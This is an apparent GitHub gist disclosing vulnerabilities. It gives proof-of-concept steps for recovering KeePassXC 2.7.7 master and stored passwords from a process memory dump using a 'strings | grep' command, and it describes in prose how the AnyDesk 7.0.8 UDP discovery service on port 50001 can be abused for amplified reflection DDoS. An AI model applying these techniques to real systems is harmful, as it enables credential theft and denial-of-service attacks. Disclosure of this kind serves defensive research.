Fastor Fastor01
Fastor01
/ gist:30c6d89c842feb1865ec2cd2d3806838
Last active
May 20, 2024 19:43
POC: CVE-2024-33900, CVE-2024-33901
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. Get memory dump of KeePassXC (e.g. via Windows Taskmanager or virutalbox debugvm) | |
| 2a. CVE-2024-33900 - get master password: string -e b <filename> | grep "YOUR MASTER PASSWORD" | |
| 2b. CVE-2024-33901 - get stored password: string -e b <filename> | grep "YOUR STORED PASSWORD" | |
| Note: Both attacks works every time when the database is open in KeePassXC. When the database is closed or locked the probability is 1 in 10 respectively 4 in 10. | |
| Why does it work?: Don't really know :P But is the data is somewhere in the memory regions of the qt-framework as UTF-16 string. | |
| This affects KeePassXC version 2.7.7. There is a high probablity, that other versions are also affected. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| AnyDesk 7.0.8 allows an attacker to abuse the discovery service located on udp port 50001 for DRDOS with a amplification factor of about 33. In a Network with multiple AnyDesk Clients, the amplification factor could be increased further by sending the packages to an spezial multicast IP. |